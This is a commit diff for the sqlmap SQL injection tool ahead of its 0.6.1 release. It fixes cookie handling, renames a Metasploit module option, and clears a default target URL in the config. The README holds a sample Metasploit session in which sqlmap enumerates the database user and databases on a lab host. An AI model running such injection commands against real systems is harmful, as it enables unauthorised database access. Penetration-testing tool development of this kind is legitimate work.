Some more fixes and adjustments before 0.6.1 release.

2025-07-15 10:42:27 +03:00 · 2008-10-17 15:26:43 +00:00 · 2008-10-17 15:26:43 +00:00 · 016118ce7a
commit 016118ce7a
parent 1f3ffc8ef7
5 changed files with 28 additions and 34 deletions
--- a/doc/ChangeLog
+++ b/doc/ChangeLog
@ -2,7 +2,7 @@ sqlmap (0.6.1-1) stable; urgency=low
  * Major bug fix to blind SQL injection bisection algorithm to handle an
    exception;
-  * Written a Metasploit 3 auxiliary module to run sqlmap;
+  * Added a Metasploit 3 auxiliary module to run sqlmap;
  * Implemented possibility to test for and inject also on LIKE
    statements;
  * Implemented --start and --stop options to set the first and the last
--- a/extra/msfauxmod/README
+++ b/extra/msfauxmod/README
@ -32,43 +32,42 @@ msf auxiliary(wmap_sqlmap) > show options
 Module options:
-   Name         Current Setting                                      Required  Description
+   Name         Current Setting                                                 Required  Description                                          
-   ----         ---------------                                      --------  -----------
+   ----         ---------------                                                 --------  -----------                                          
-   BATCH        true                                                 yes       Never ask for user input, use the default behaviour
+   BATCH        true                                                            yes       Never ask for user input, use the default behaviour  
-   DATA                                                              no        The data string to be sent through POST
+   BODY                                                                         no        The data string to be sent through POST              
-   METHOD       GET                                                  yes       HTTP Method
+   METHOD       GET                                                             yes       HTTP Method                                          
-   OPTS         --dbs --current-user                                 no        The sqlmap options to use
+   OPTS         --dbs --current-user                                            no        The sqlmap options to use                            
-   PATH         /sqlmap/mysql/get_int.php                            yes       The path/file to test for SQL injection
+   PATH         /sqlmap/mysql/get_int.php                                       yes       The path/file to test for SQL injection              
-   Proxies                                                           no        Use a proxy chain
+   Proxies                                                                      no        Use a proxy chain                                    
-   QUERY        id=1                                                 no        HTTP GET query
+   QUERY        id=1                                                            no        HTTP GET query                                       
-   RHOSTS       192.168.1.121                                        yes       The target address range or CIDR identifier
+   RHOSTS       192.168.1.121                                                   yes       The target address range or CIDR identifier          
-   RPORT        80                                                   yes       The target port
+   RPORT        80                                                              yes       The target port                                      
-   SQLMAP_PATH  /home/inquis/software/sqlmap/trunk/sqlmap/sqlmap.py  yes       The sqlmap >= 0.6.1 full path
+   SQLMAP_PATH  /home/inquis/software/sqlmap/trunk/sqlmap/sqlmap.py             yes       The sqlmap >= 0.6.1 full path                        
-   SSL          false                                                no        Use SSL
+   SSL          false                                                           no        Use SSL                                              
-   THREADS      1                                                    yes       The number of concurrent threads
+   THREADS      1                                                               yes       The number of concurrent threads                     
-   VHOST                                                             no        HTTP server virtual host
+   VHOST                                                                        no        HTTP server virtual host                             
 msf auxiliary(wmap_sqlmap) > run
-[*] exec: /home/inquis/software/sqlmap/trunk/sqlmap/sqlmap.py -u 'http://192.168.1.121/sqlmap/mysql/get_int.php?id=1' --method GET --dbs --current-user --batch
+[*] exec: /home/inquis/software/sqlmap/trunk/sqlmap/sqlmap.py -u 'http://192.168.1.121:80//sqlmap/mysql/get_int.php?id=1' --method GET --dbs --current-user --batch
 SQLMAP: 
 SQLMAP: sqlmap/0.6.1 coded by Bernardo Damele A. G. <bernardo.damele@gmail.com>
 SQLMAP: and Daniele Bellucci <daniele.bellucci@gmail.com>
 SQLMAP: 
-SQLMAP: [*] starting at: 01:31:41
+SQLMAP: [*] starting at: 16:23:19
 SQLMAP: 
-SQLMAP: [01:31:42] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
+SQLMAP: [16:23:20] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
 SQLMAP: back-end DBMS:  MySQL >= 5.0.0
 SQLMAP: 
 SQLMAP: current user:    'testuser@localhost'
 SQLMAP: 
-SQLMAP: available databases [4]:
+SQLMAP: available databases [3]:
 SQLMAP: [*] information_schema
 SQLMAP: [*] mysql
 SQLMAP: [*] privatedb
 SQLMAP: [*] test
 SQLMAP: 
 SQLMAP: 
-SQLMAP: [*] shutting down at: 01:31:44
+SQLMAP: [*] shutting down at: 16:23:21
 SQLMAP: 
 [*] Auxiliary module execution completed
 msf auxiliary(wmap_sqlmap) > 
--- a/extra/msfauxmod/wmap_sqlmap.rb
+++ b/extra/msfauxmod/wmap_sqlmap.rb
@ -39,7 +39,7 @@ class Metasploit3 < Msf::Auxiliary
 				OptString.new('METHOD', [ true,  "HTTP Method", 'GET' ]),
 				OptString.new('PATH', [ true,  "The path/file to test for SQL injection", 'index.php' ]),
 				OptString.new('QUERY', [ false, "HTTP GET query", 'id=1' ]),
-				OptString.new('DATA', [ false, "The data string to be sent through POST", '' ]),
+				OptString.new('BODY', [ false, "The data string to be sent through POST", '' ]),
 				OptString.new('OPTS', [ false,  "The sqlmap options to use", ' ' ]),
 				OptPath.new('SQLMAP_PATH', [ true,  "The sqlmap >= 0.6.1 full path ", '/sqlmap/sqlmap.py' ]), 
 				OptBool.new('BATCH', [ true,  "Never ask for user input, use the default behaviour", 'true' ])
@ -56,7 +56,7 @@ class Metasploit3 < Msf::Auxiliary
 			return
 		end
-		data = datastore['DATA']
+		data = datastore['BODY']
 		method = datastore['METHOD'].upcase
 		sqlmap_url  = (datastore['SSL'] ? "https" : "http")
--- a/lib/request/connect.py
+++ b/lib/request/connect.py
@ -98,9 +98,12 @@ class Connect:
        requestMsg += " HTTP/1.1"
        if cookie:
            cookie = urlencode(cookie).replace("%%", "%")
        try:
            # Perform HTTP request
-            headers        = forgeHeaders(urlencode(cookie).replace("%%", "%"), ua)
+            headers        = forgeHeaders(cookie, ua)
            req            = urllib2.Request(url, post, headers)
            conn           = urllib2.urlopen(req)
--- a/sqlmap.conf
+++ b/sqlmap.conf
@ -2,15 +2,7 @@
 # Target URL.
 # Example: http://192.168.1.121/sqlmap/mysql/get_int.php?id=1&cat=2
-url = http://127.0.0.1/sqlmap/mysql/get_int.php?id=1
+url = 
 #url = http://127.0.0.1/sqlmap/mysql/get_brackets.php?id=1
 #url = http://127.0.0.1/sqlmap/mysql/get_str_like.php?id=1
 #url = http://127.0.0.1/sqlmap/mysql/get_str_like_par.php?id=1
 #url = http://127.0.0.1/sqlmap/mysql/get_str_like_par2.php?id=1
 #url = http://127.0.0.1/sqlmap/mysql/get_str_like_par3.php?id=1
 #url = http://127.0.0.1/sqlmap/mysql/get_dstr_like_par.php?id=1
 #url = http://127.0.0.1/sqlmap/mysql/get_dstr_like_par2.php?id=1
 #url = http://127.0.0.1/sqlmap/mysql/get_int_str.php?id=1&name=luther
 # Rather than providing a target url, let Google return target
 # hosts as result of your Google dork expression. For a list of Google